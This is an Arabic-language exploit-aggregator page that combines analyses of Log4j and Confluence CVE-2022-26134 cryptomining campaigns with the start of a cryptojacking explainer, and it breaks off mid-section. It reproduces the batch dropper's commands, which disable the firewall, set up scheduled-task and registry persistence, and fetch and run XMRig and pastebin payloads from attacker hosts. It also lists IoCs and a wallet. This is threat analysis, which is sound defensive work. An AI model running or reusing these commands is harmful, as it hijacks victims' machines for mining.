Sploitus

Exploit Code

MARKDOWN688 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-DEMINING-LOG4J-VULNERABILITY
# ثغرة Log4j

* * *

* * *

![استغلال في شفرة تعدين العملات الرقمية استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/646c8de5f568a491e55291aab50f4d260a1aac69b8556099dc6893e51a5d79c9.png)

* * *

  * البرنامج التعليمي: https://youtu.be/PNDBjoT83zA
  * البرنامج التعليمي: https://cryptodeeptech.ru/log4j-vulnerability



* * *

* * *

### خلفية عن Log4j

كشف فريق أمان سحابة Alibaba علنًا عن ثغرة أمنية خطيرة (CVE-2021-44228) تتيح تنفيذ تعليمات برمجية عن بُعد بدون مصادقة ضد إصدارات متعددة من Apache Log4j2 (Log4Shell). يمكن للمهاجمين استغلال الخوادم الضعيفة عن طريق الاتصال عبر أي بروتوكول مثل HTTPS وإرسال سلسلة نصية مصممة خصيصًا.

### حملة تعدين العملات الرقمية عبر Log4j

اكتشفت Darktrace نشاط تعدين عملات رقمية على عدة نشرات عملاء حدث نتيجة استغلال ثغرة Log4j هذه. في كل من هذه الحوادث، حدث الاستغلال عبر اتصالات SSL صادرة تبدو كطلبات لبرامج PowerShell النصية المشفرة بـ base64 لتجاوز الدفاعات الطرفية وتنزيل ملفات برمجية دفعية (.bat) وملفات قابلة للتنفيذ متعددة تقوم بتثبيت برمجيات تعدين ضارة. كان للنشاط مؤشرات حملة أوسع، بما في ذلك عناوين IP ثابتة شائعة وملفات قابلة للتنفيذ وبرامج نصية.

تبدأ دورة الهجوم بما يبدو كمسح انتهازي للأجهزة المتصلة بالإنترنت بحثًا عن خوادم VMWare Horizons المعرضة لاستغلال Log4j. بمجرد العثور على خادم ضعيف، يقوم المهاجم باتصالات HTTP و SSL بالضحية. بعد الاستغلال الناجح، يقوم الخادم باستدعاء على المنفذ 1389، لاسترداد برنامج نصي يُدعى mad_micky.bat. يحقق هذا ما يلي:

  * تعطيل جدار الحماية لنظام Windows عن طريق تعيين جميع الملفات الشخصية على الحالة = off  
‘netsh advfirewall set allprofiles state off’
  * البحث عن العمليات الحالية التي تشير إلى وجود تثبيتات عامل تعدين أخرى باستخدام ‘netstat -ano | findstr TCP’ لتحديد أي عملية تعمل على المنافذ :3333, :4444, :5555, :7777, :9000 وإيقاف العمليات الجارية
  * بدء عميل ويب جديد لتنزيل wxm.exe بصمت
  * استخدام المهام المجدولة لإنشاء الثبات. الأمر ‘schtasks /create /F /sc minute /mo 1 /tn –‘ يقوم بجدولة مهمة وكبت التحذيرات، ويتم جدولة المهمة في غضون دقيقة من الأمر ويتم إعطاؤها الاسم ‘BrowserUpdate’، مشيرًا إلى نطاق ضار ‘b.oracleservice[.]top’ وعناوين IP ثابتة: 198.23.214[.]117:8080 -o 51.79.175[.]139:8080 -o 167.114.114[.]169:8080
  * إضافة مفاتيح التسجيل في RunOnce للثبات: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run2 /d



في حالتين على الأقل، تم استرداد البرنامج النصي mad_micky.bat في اتصال HTTP كان وكيل المستخدم الخاص به Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MAARJS). كانت هذه المرة الأولى والوحيدة التي شوهد فيها وكيل المستخدم هذا على هذه الشبكات. يبدو أن وكيل المستخدم هذا يُستخدم بشكل شرعي من قبل بعض أجهزة ASUS مع تثبيتات المصنع الجديدة؛ ومع ذلك، باعتباره وكيل مستخدم جديد لم يظهر إلا خلال هذا النشاط، فهو مشبوه.

بعد الاستغلال الناجح، يقوم الخادم باستدعاء على المنفذ 1389، لاسترداد ملفات البرنامج النصي. في هذا المثال، /xms.ps1 هو برنامج PowerShell النصي المشفر بـ base-64 الذي يتجاوز سياسة التنفيذ على المضيف لاستدعاء ‘mad_micky.bat’:

![استغلال في شفرة تعدين العملات الرقمية استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/8cb2a83ff4a8f40139a3b00c4a07f8208611a151e6975f285eb8a617736fbfa0.jpg)

_الشكل 1: رؤية إضافية حول البرنامج النصي PowerShell xms.ps1_

توضح اللقطة السريعة سجل الأحداث لخادم متأثر وتشير إلى نجاح RCE عبر Log4j الذي أدى إلى تنزيل ملف mad_micky.bat:

![استغلال في شفرة تعدين العملات الرقمية استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/9316ebc6a705a397ff241e8d7541aeebadfcfd4cae96723638e0f433c204435b.jpg)

_الشكل 2: بيانات السجل التي تبرز ملف mad_micky.bat_

تم بدء اتصالات إضافية لاسترداد الملفات القابلة للتنفيذ والبرامج النصية. احتوت البرامج النصية على عنوانين IP موجودين في كوريا وأوكرانيا. تم إجراء اتصال بعنوان IP الأوكراني لتنزيل الملف القابل للتنفيذ xm.exe، الذي ينشط عامل التعدين. عامل التعدين، XMRig Miner (في هذه الحالة) هو أداة تعدين مفتوحة المصدر ومتعددة المنصات متاحة للتنزيل من عدة مواقع عامة. كان التنزيل التالي لملف exe هو ‘wxm.exe’ (f0cf1d3d9ed23166ff6c1f3deece19b4).

![استغلال في شفرة تعدين العملات الرقمية استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/ff4d3bca1b1bd9c7b129a227c912ac437a4507404bf957af0504fd57b3c37452.png)

_الشكل 3: رؤية إضافية حول الملف القابل للتنفيذ XMRig_

تضمن الاتصال بعنوان IP الكوري طلبًا لبرنامج نصي آخر (/2.ps1) بالإضافة إلى ملف قابل للتنفيذ (LogBack.exe). يقوم هذا البرنامج النصي بحذف المهام الجارية المرتبطة بالتسجيل، بما في ذلك مرشح سجل أحداث SCM أو مستهلك سجل أحداث PowerShell. يطلب البرنامج النصي أيضًا ملفًا من Pastebin، وهو على الأرجح ملف تكوين Cobalt Strike beacon. تم إجراء عمليات حذف السجل من خلال المهام المجدولة و WMI وتضمنت: Eventlogger، SCM Event Log Filter، DSM Event Log Consumer، PowerShell Event Log Consumer، Windows Events Consumer، BVTConsumer.

  * ملف التكوين (لم يعد مستضافًا): IEX (New-Object System.Net.Webclient) DownloadString(‘hxxps://pastebin.com/raw/g93wWHkR’)



الملف الثاني المطلوب من Pastebin، على الرغم من أنه لم يعد مستضافًا بواسطة Pastebin، هو جزء من أمر schtasks، وبالتالي ربما تم استخدامه لإنشاء الثبات:

  * schtasks /create /sc MINUTE /mo 5 /tn “\Microsoft\windows\\.NET Framework\\.NET Framework NGEN v4.0.30319 32” /tr “c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c ‘IEX ((new-object net.webclient).downloadstring(”hxxps://pastebin.com/raw/bcFqDdXx”’))'” /F /ru System



الملف القابل للتنفيذ Logback.exe هو أداة تعدين XMRig أخرى. تم أيضًا تنزيل ملف config.json من نفس عنوان IP الكوري. بعد ذلك، تم استخدام أوامر cmd.exe و wmic لتكوين عامل التعدين.

تبعت هذه التنزيلات للملفات وتكوين عامل التعدين اتصالات إضافية بـ Pastebin.

![استغلال في شفرة تعدين العملات الرقمية استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/673c64550e516276b5b4b9ae76cf2e392e14c1b1380840348aaa010c20a71520.jpg)

_الشكل 4: ربط OSINT لملف mad_micky.bat_

* * *

### تفاصيل العملية — ملف mad_micky.bat

#### التثبيت

root@kitploit:~
    
    
    set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”
    set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup”
    
    looking for the following utilities: powershell, find, findstr, tasklist, sc
    set “LOGFILE=%USERPROFILE%\mimu6\xmrig.log”
    if %EXP_MONER_HASHRATE% gtr 8192 ( set PORT=18192 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 4096 ( set PORT=14906 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 2048 ( set PORT=12048 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 1024 ( set PORT=11024 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 512 ( set PORT=10512 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 256 ( set PORT=10256 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 128 ( set PORT=10128 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 64 ( set PORT=10064 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 32 ( set PORT=10032 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 16 ( set PORT=10016 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 8 ( set PORT=10008 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 4 ( set PORT=10004 & goto PORT_OK)
    if %EXP_MONER_HASHRATE% gtr 2 ( set PORT=10002 & goto PORT_OK)
    set port=10001

* * *

#### تحضير عامل التعدين

root@kitploit:~
    
    
    echo [*] Removing previous mimu miner (if any)
    sc stop gado_miner
    sc delete gado_miner
    taskkill /f /t /im xmrig.exe
    taskkill /f /t/im logback.exe
    taskkill /f /t /im network02.exe
    :REMOVE_DIR0
    echo [*] Removing “%USERPROFILE%\mimu6” directory
    timeout 5
    rmdir /q /s “USERPROFILE%\mimu6” >NUL 2>NUL
    IF EXIST “%USERPROFILE%\mimu6” GOTO REMOVE_DIR0

* * *

#### تنزيل XMRIG

root@kitploit:~
    
    
    echo [*] Downloading MoneroOcean advanced version of XMRig to “%USERPROFILE%\xmrig.zip”
    powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘http://141.85.161[.]18/xmrig.zip’, ;%USERPROFILE%\xmrig.zip’)”
    echo copying to mimu directory
    if errorlevel 1 (
    echo ERROR: Can’t download MoneroOcean advanced version of xmrig
    goto MINER_BAD)

* * *

#### فك الضغط والتثبيت

root@kitploit:~
    
    
    echo [*] Unpacking “%USERPROFILE%\xmrig.zip” to “%USERPROFILE%\mimu6”
    powershell -Command “Add-type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(‘%USERPROFILE%\xmrig.zip’, ‘%USERPROFILE%\mimu6’)”
    if errorlevel 1 (
    echo [*] Downloading 7za.exe to “%USERPROFILE%za.exe”
    powershell -Command “$wc = New-Object System.Net.WebClient; $wc.Downloadfile(‘http://141.85.161[.]18/7za.txt’, ‘%USERPROFILE%za.exe’”
    
    powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”url\”: *\”.*\”,’, ‘\”url\”: \”207.38.87[.]6:3333\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
    powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”user\”: *\”.*\”,’, ‘\”user\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
    powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”pass\”: *\”.*\”,’, ‘\”pass\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
    powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”max-cpu-usage\”: *\d*,’, ‘\”max-cpu-usage\”: 100,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
    set LOGFILE2=%LOGFILE:\=\\%
    powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”log-file\”: *null,’, ‘\”log-file\”: \”%LOGFILE2%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
    if %ADMIN% == 1 goto ADMIN_MINER_SETUP
    
    if exist “%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup” (
    set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”
    goto STARTUP_DIR_OK
    )
    if exist “%USERPROFILE%\Start Menu\Programs\Startup” (
    set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup”
    goto STARTUP_DIR_OK
    )
    echo [*] Downloading tools to make gado_miner service to “%USERPROFILE%\nssm.zip”
    powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘[http://141.85.161[.]18/nssm.zip’, ‘%USERPROFILE%\nssm.zip’)”
    if errorlevel 1 (
    echo ERROR: Can’t download tools to make gado_miner service
    exit /b 1

### كشف الحملة باستخدام Darktrace

تتضمن خروقات النماذج الرئيسية التي استخدمتها Darktrace لتحديد هذه الحملة نماذج تركز على الاختراق مثل  _بروتوكول التطبيق على منفذ غير شائع_ ,  _اتصال صادر إلى نادر من خادم_ , و  _إرسال إشارات إلى وجهة نادرة_. نماذج تركز على الملفات مثل  _نقل ملف متنكر_ ,  _ملفات قابلة للتنفيذ وبرامج نصية متعددة من مواقع نادرة_ , و  _محتوى مضغوط من موقع خارجي نادر_. يتم كشف تعدين العملات الرقمية ضمن نماذج  _نشاط تعدين العملات الرقمية_.

تسلط النماذج المرتبطة بـ  _PowerShell غير عادي إلى وكيل مستخدم نادر وجديد_ الضوء على الاتصالات الشاذة على الأجهزة المصابة بعد استدعاءات Log4j.

العميلات الذين لديهم تقنية Darktrace للاستجابة الذاتية Autonomous Response ، Antigena، كان لديهم أيضًا إجراءات لحظر الملفات والبرامج النصية الواردة التي تم تنزيلها وتقييد الأجهزة المصابة بنمط الحياة الطبيعي لمنع كل من تنزيلات الملفات الضارة الأولية ونشاط تعدين العملات الرقمية المستمر.

### الملحق

#### اكتشافات نموذج Darktrace

  * اتصال شاذ / بروتوكول تطبيق على منفذ غير شائع
  * اتصال شاذ / وكيل مستخدم جديد إلى IP بدون اسم مضيف
  * اتصال شاذ / PowerShell إلى خارجي نادر
  * ملف شاذ / EXE من موقع خارجي نادر
  * ملف شاذ / نقل ملف متنكر
  * ملف شاذ / EXE متعدد من مواقع خارجية نادرة
  * ملف شاذ / برنامج نصي من موقع خارجي نادر
  * ملف شاذ / Zip أو Gzip من موقع خارجي نادر
  * نشاط خادم شاذ / صادر من خادم
  * الامتثال / نشاط تعدين العملات الرقمية
  * اختراق / إشارة وكيل (فترة طويلة)
  * اختراق / إشارة وكيل (فترة متوسطة)
  * اختراق / إشارة وكيل (فترة قصيرة)
  * اختراق / إشارة إلى نقطة نهاية حديثة
  * اختراق / نشاط إشارات إلى خارجي نادر
  * اختراق / نشاط تعدين العملات الرقمية
  * اختراق / نشاط إشارات TCP مستدامة إلى نقطة نهاية نادرة
  * جهاز / وكيل مستخدم PowerShell جديد
  * جهاز / نطاق مشبوه



#### تقنيات MITRE ATT&CK الملاحظة

![استغلال في شفرة تعدين العملات الرقمية استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/1e487b291652756b3c690f1ff542cabe7efc458c08e4c78f9c75e0073658ab13.jpg)

#### مؤشرات الاختراق (IoCs)

![استغلال في شفرة تعدين العملات الرقمية استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/024c97a682462a6c9e2627c39834d43b2b051d1f80d0c492aaf1a0445d70b858.jpg) ![استغلال في شفرة تعدين العملات الرقمية استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/a6e1a6439a00db47861f78bc0256d7c9b2ee801c53e645ff4119d35bd65fd025.jpg) ![استغلال في شفرة تعدين العملات الرقمية استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/aaf22838ba0c983ade12f5acea245729ebf9dbc348bb99cb4f4946e1de74f3e6.jpg)

* * *

في 31 مايو، تم الإبلاغ عن ثغرة أمنية خطيرة غير مصححة، تؤثر على جميع إصدارات Confluence server و data center المدعومة، إلى Atlassian من قبل Volexity، وهي شركة أمنية.

حذرت Atlassian عملاءها من الثغرة الأمنية الحرجة في 2 يونيو وأصدرت تصحيحًا في اليوم التالي. أضافت CISA هذه الثغرة إلى قائمة الثغرات المعروفة المستغلة في 3 يونيو.

أصدرت Check Point حماية مخصصة لمنع هجوم يستغل هذه الثغرة وتنصح العملاء بتصحيح الأنظمة المتأثرة.

**الثغرة الأمنية**

الثغرة الأمنية في Atlassian Confluence و Data Center، المسماة CVE-2022-26134، قد تؤدي إلى هجوم حقن تعبير OGNL (Object-Graph Navigation Language) بدون مصادقة.

يمكن للمهاجم عن بُعد غير مصادق استخدام هذه الثغرة لتنفيذ تعليمات برمجية عشوائية على الخادم الهدف عن طريق وضع حمولة ضارة في URI.

![استغلال في شفرة تعدين العملات الرقمية استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/b8b154a8d2ef6e7c972147673fba2b247927f7c06dbd4350326120ba3595a05c.png)

الشكل 1: حمولة ضارة تستغل CVE-2022-26134.

**الاستغلال في البيئة الحية**

لاحظ باحثو Check Point Research (CPR) عددًا كبيرًا من محاولات الاستغلال منذ نشر الثغرة. في البداية، استخدم العديد من المهاجمين المحتملين طرق المسح لتحديد الأهداف الضعيفة. بعد بضعة أيام، بدأ المهاجمون في استخدام الثغرة لتنزيل برمجيات ضارة على الأنظمة المتأثرة.

من بين سجلات الاستغلال، لاحظ الباحثون بعض الحمولات الضارة المرتبطة بنفس الحملة والتي نشأت من نفس المصدر ولكنها استهدفت منصات مختلفة: Linux و Windows.

تعتمد سلسلة العدوى على نظام تشغيل الضحية.

**الهجوم المستهدف على نظام Linux OS**

استغل المهاجم ثغرة Atlassian 0-day عن طريق إرسال طلب HTTP مصمم إلى الضحية.

![استغلال في شفرة تعدين العملات الرقمية استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/dd708f50a18b212d774330ca321c723a332199a76fca3b1561a3a6597b5d040a.png)

الشكل 2: طلب HTTP مصمم يستغل CVE-2022-26134 مع حمولة مشفرة بـ base64.

يتم فك تشفير السلسلة base64 إلى سلسلة أخرى مشفرة بـ base64. بشكل عام، كان على الباحثين فك تشفير السلسلة عدة مرات للحصول على الحمولة الفعلية.

![استغلال في شفرة تعدين العملات الرقمية استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/19b1b8857272a924d6c9a8c20b44ef254c799963652f4318c07909adeb783603.png)

الشكل 3: السلسلة base64 التي تم فك تشفيرها.

يقوم هذا السكربت بتنزيل ملف سكربت _bash_ يُسمى _xms_ من خادم القيادة والتحكم (C&C) البعيد إلى مجلد _tmp_ الخاص بالضحية، ويقوم بتشغيله ثم حذفه بعد ذلك.

![استغلال في كود تعدين العملات الرقمية استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/4fcbcd195a13dc68a546bbbadffcdbd65a0f0e30b720499519264eabc1cb32be.png)

الشكل 4: جزء من سكربت xms الخبيث.

ملف _xms_ هو سكربت مُحمِّل (dropper). يقوم بإلغاء تثبيت العوامل (agents) قيد التشغيل من جهاز الضحية ويُضيف نفسه إلى وظائف cron (cron jobs) للحفاظ على الاستمرارية بعد إعادة التشغيل.

بالإضافة إلى ذلك، يتم إجراء اختبار اتصال بالشبكة باستمرار إلى a[.]oracleservice.top.

في محاولة للانتشار إلى أجهزة أخرى، يبحث السكربت عن مفاتيح SSH ويحاول الاتصال. ثم يقوم بتنزيل ملف xms من خادم C&C وتشغيله.

يقوم السكربت بتنزيل ملف قابل للتنفيذ من نوع elf يُسمى _dbused_ إلى مجلد _tmp_ في عناوين IP بعيدة متنوعة.

ملف _dbused_ مُعبّأ باستخدام upx لتجنب الكشف الثابت (static detection).

ملف elf هو عامل تعدين للعملات الرقمية (crypto miner) يستنزف موارد جهاز الضحية:

![استغلال في كود تعدين العملات الرقمية استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/e0279dca959a4ddc136939a792b531db711cb1db1a8fd95d0c66a094be9ab7a7.png)

الشكل 5: عملية dbused تستنزف موارد النظام.

**الهجوم المستهدف على نظام Windows**

استغل المهاجم ثغرة Atlassian لتنفيذ أمر تنزيل بدائي (PowerShell download cradle) لشن هجوم بدون ملفات (fileless attack) من خادم C&C بعيد.

![استغلال في كود تعدين العملات الرقمية استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/7b4d1082e4eb463d73a2cbc3a2d9e74ab8b2544a9f8d773147a73d2553cfe4d8.png)

الشكل 6: طلب HTTP مُصمم يستغل CVE-2022-26134 باستخدام أوامر PowerShell.

يتم حقن سكربت _lol.ps1_ في عملية ذاكرة PowerShell.

يتحقق السكربت من بنية المعالج (processor architecture)، مستخدماً _wmi_ للتحقق مما إذا كانت تطابق متطلباته.  
ثم يقوم بتنزيل ملف قابل للتنفيذ يُسمى _checkit2_ إلى مجلد _tmp_ وتشغيله في وضع مخفي (hidden mode).

![استغلال في كود تعدين العملات الرقمية استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/ea1a1199355cb181333c2485699e5506ca9ad1908d5706ece09c35b7d31a1622.png)

الشكل 7: سكربت lol.ps1.

عملية _checkit2.exe_ تُنشئ عملية فرعية تُسمى _InstallUtil.exe_ ، والتي تتصل بخادم C&C. بدورها، تُنشئ _InstallUtil.exe_ عملية فرعية أخرى هي _AddInProcess.exe_ ، وهي عامل تعدين العملات الرقمية. بعد لحظات من التشغيل على جهاز الضحية، تقوم عملية _checkit2_ بإنهاء نفسها.

![استغلال في كود تعدين العملات الرقمية استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/6349608a3f8e71c5e4a04d70522a92d0376dd6f85c1683d7257906e9e18283c0.png)

الشكل 8: عملية checkit2.exe قيد التشغيل على النظام.

![استغلال في كود تعدين العملات الرقمية استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/468aee56a9d1dd99ff9d3f9b064d35c28cb889aa7483bd637e408af3417792ca.png)

الشكل 9: عملية InstallUtil.exe قيد التشغيل على النظام.

يقوم البرنامج الضار بتنزيل نسخة جديدة من نفسه، باسم جديد، إلى مجلد قائمة ابدأ (Start Menu).

![استغلال في كود تعدين العملات الرقمية استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/9e1f0d355dd6ffa32befd1fbd43223c776e72e635c42eaa31c0fe919077c514f.png)

الشكل 10: ملف cloud.exe الذي تم تنزيله إلى مجلد بدء التشغيل (Startup).

يعمل عامل تعدين العملات الرقمية الآن على الجهاز ويستنزف جميع موارد النظام:

![استغلال في كود تعدين العملات الرقمية استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/4ca42ac9980db1bcf41557627c0ef4e23e385c263d5ac1fe81f2c580095e0453.png)

الشكل 11: معلومات محفظة العملات الرقمية.

**سلسلة الهجوم**

![استغلال في كود تعدين العملات الرقمية استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/f688945e7c4b78c737ec7c464b618de21132111914126f54893e7f323db56fc2.png)

يبدأ كلا سيناريوهي الهجوم بطلب HTTP مُصمم مبدئي يستغل ثغرة CVE-2022-26134. يقوم المهاجم بتنفيذ أوامر باستخدام وظيفة التنفيذ في Java (Java execution function) لتنزيل حمولة خبيثة (malicious payload) إلى جهاز الضحية.

ثم تقوم الحمولة الخبيثة بتنزيل ملف قابل للتنفيذ وفقاً لنظام التشغيل المتأثر. يقوم كلا الملفين القابلين للتنفيذ بتشغيل عامل تعدين عملات رقمية لاستخدام موارد الضحية لصالح المهاجم.

**الجهات الفاعلة (Threat Actors)**

النطاق a[.]oracleservice.top ومحفظة العملات الرقمية التي استخرجناها من النظام مرتبطة بمجموعة إجرامية إلكترونية تُسمى "عصابة 8220".

**حمايات Check Point:**

IPS:  
Atlassian Confluence Remote Code Execution (CVE-2022-26134)

Anti-Bot:  
Trojan.WIN32.XMRig

**مؤشرات الاختراق (IOCs):**

198.251.86[.]46

51.79.175[.]139

167.114.114[.]169

146.59.198[.]38

51.255.171[.]23

a.oracleservice[.]top

d2bae17920768883ff8ac9a8516f9708967f6c6afe2aa6da0241abf8da32456e

2622f6651e6eb01fc282565ccbd72caba9844d941b9d1c6e6046f68fc873d5e0

4e48080f37debd76af54a3231ecaf3aa254a008fae1253cdccfcc36640f955d9

4b8be1d23644f8cd5ea22fa4f70ee7213d56e3d73cbe1d0cc3c8e5dfafe753e0

محفظة Monero:  
46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ

* * *

# شرح التعدين الخفي (Cryptojacking): كيفية منعه واكتشافه والتعافي منه

### يستخدم المجرمون تكتيكات شبيهة ببرامج الفدية (ransomware) ومواقع إلكترونية مسمومة لجعل أجهزة موظفيك تقوم بتعدين العملات الرقمية. إليك ما يمكنك فعله لوقف ذلك.

## **تعريف التعدين الخفي (Cryptojacking)**

التعدين الخفي (Cryptojacking) هو الاستخدام غير المصرح به لموارد الحوسبة الخاصة بشخص آخر لتعدين العملات الرقمية. يسعى القراصنة إلى اختطاف أي نوع من الأنظمة يمكنهم السيطرة عليه — أجهزة الكمبيوتر المكتبية، الخوادم، البنية التحتية السحابية وغيرها — للتعدين بشكل غير مشروع للحصول على العملات الرقمية.

بغض النظر عن آلية التسليم، يعمل كود التعدين الخفي عادةً بهدوء في الخلفية بينما يستخدم الضحايا غير المتوقعين أنظمتهم بشكل طبيعي. العلامات الوحيدة التي قد يلاحظونها هي أداء أبطأ، تأخيرات في التنفيذ، ارتفاع درجة الحرارة، استهلاك مفرط للطاقة، أو فواتير حوسبة سحابية عالية بشكل غير طبيعي.

## **كيف يعمل التعدين الخفي**

تعدين العملات (Coin mining) هو عملية مشروعة في عالم العملات الرقمية تُطلق عملات رقمية جديدة للتداول. تعمل العملية عن طريق مكافأة العملة لأول مُعدّن (miner) يحل مشكلة حسابية معقدة. تلك المشكلة تُكمل كتلًا من المعاملات المُتحقق منها والتي تُضاف إلى سلسلة الكتل (blockchain) الخاصة بالعملة الرقمية.

“المُعدّنون يحصلون أساسًا على أجر مقابل عملهم كمدققين. إنهم يقومون بعمل التحقق من صحة معاملات Bitcoin،” كما فصّلت مقالة تفسيرية حديثة من Investopedia حول كيفية عمل تعدين Bitcoin. “بالإضافة إلى ملء جيوب المُعدّنين ودعم نظام Bitcoin البيئي، يخدم التعدين غرضًا حيويًا آخر: إنه الطريقة الوحيدة لإطلاق عملات رقمية جديدة للتداول.”

يتطلب كسب العملات الرقمية عبر تعدين العملات عادةً كمية هائلة من الطاقة الحاسوبية والطاقة لتحقيق ذلك. بالإضافة إلى ذلك، صُمم نظام العملات الرقمية البيئي بطريقة تجعل التعدين أكثر صعوبة وتقلل المكافآت عليه بمرور الوقت ومع زيادة المنافسة في التعدين. وهذا يجعل تعدين العملات الرقمية المشروع أمرًا مكلفًا للغاية، مع ارتفاع النفقات طوال الوقت.

يقلل مجرمو الإنترنت من التكاليف العامة للتعدين ببساطة عن طريق سرقة موارد الحوسبة والطاقة. يستخدمون مجموعة من تقنيات الاختراق للوصول إلى الأنظمة التي ستقوم بالعمل الحسابي بشكل غير مشروع ومن ثم جعل هذه الأنظمة المخترقة ترسل النتائج إلى خادم يتحكم فيه المخترق.

## طرق هجمات التعدين الخفي

طرق الهجوم محدودة فقط بإبداع المُعدّنين الخفيين، ولكن فيما يلي بعض من أكثرها شيوعًا المستخدمة اليوم.

### **الهجمات على نقاط النهاية (Endpoint attacks)**

في الماضي، كان التعدين الخفي في الأساس أسلوبًا لبرمجيات endpoints الخبيثة، حيث كان يهدف إلى تحقيق ربح مالي من إسقاط برامج ضارة على أجهزة الكمبيوتر المكتبية والمحمولة. يتم تسليم برامج التعدين الخفي التقليدية عبر مسارات نموذجية مثل البرامج الضارة عديمة الملفات (fileless malware)، وخطط التصيد (phishing)، والبرامج النصية الخبيثة المضمنة في المواقع الإلكترونية وتطبيقات الويب.

الطريقة الأكثر أساسية التي يمكن لمهاجمي التعدين الخفي من خلالها سرقة الموارد هي إرسال بريد إلكتروني يبدو شرعيًا إلى مستخدمي endpoints يشجعهم على النقر على رابط يقوم بتشغيل كود لوضع سكربت تعدين العملات الرقمية على أجهزة الكمبيوتر الخاصة بهم. يعمل هذا السكربت في الخلفية ويرسل النتائج مرة أخرى عبر بنية تحتية للتحكم والأوامر (C2).

طريقة أخرى هي حقن سكربت في موقع ويب أو إعلان يتم تسليمه إلى مواقع ويب متعددة. بمجرد أن يزور الضحية الموقع الإلكتروني أو يظهر الإعلان المصاب في متصفحهم، يتم تنفيذ السكربت تلقائيًا. لا يتم تخزين أي كود على أجهزة الكمبيوتر الخاصة بالضحايا.

لا تزال هذه الطرق تمثل مصدر قلق مشروعًا، على الرغم من أن المجرمين أضافوا تقنيات أكثر تطورًا بشكل ملحوظ إلى خطط لعب التعدين الخفي (cryptojacking playbooks) الخاصة بهم أثناء سعيهم لتوسيع نطاق الأرباح، مع وصف بعض هذه الأساليب المتطورة أدناه.

### **المسح بحثًا عن الخوادم والأجهزة الشبكية الضعيفة**

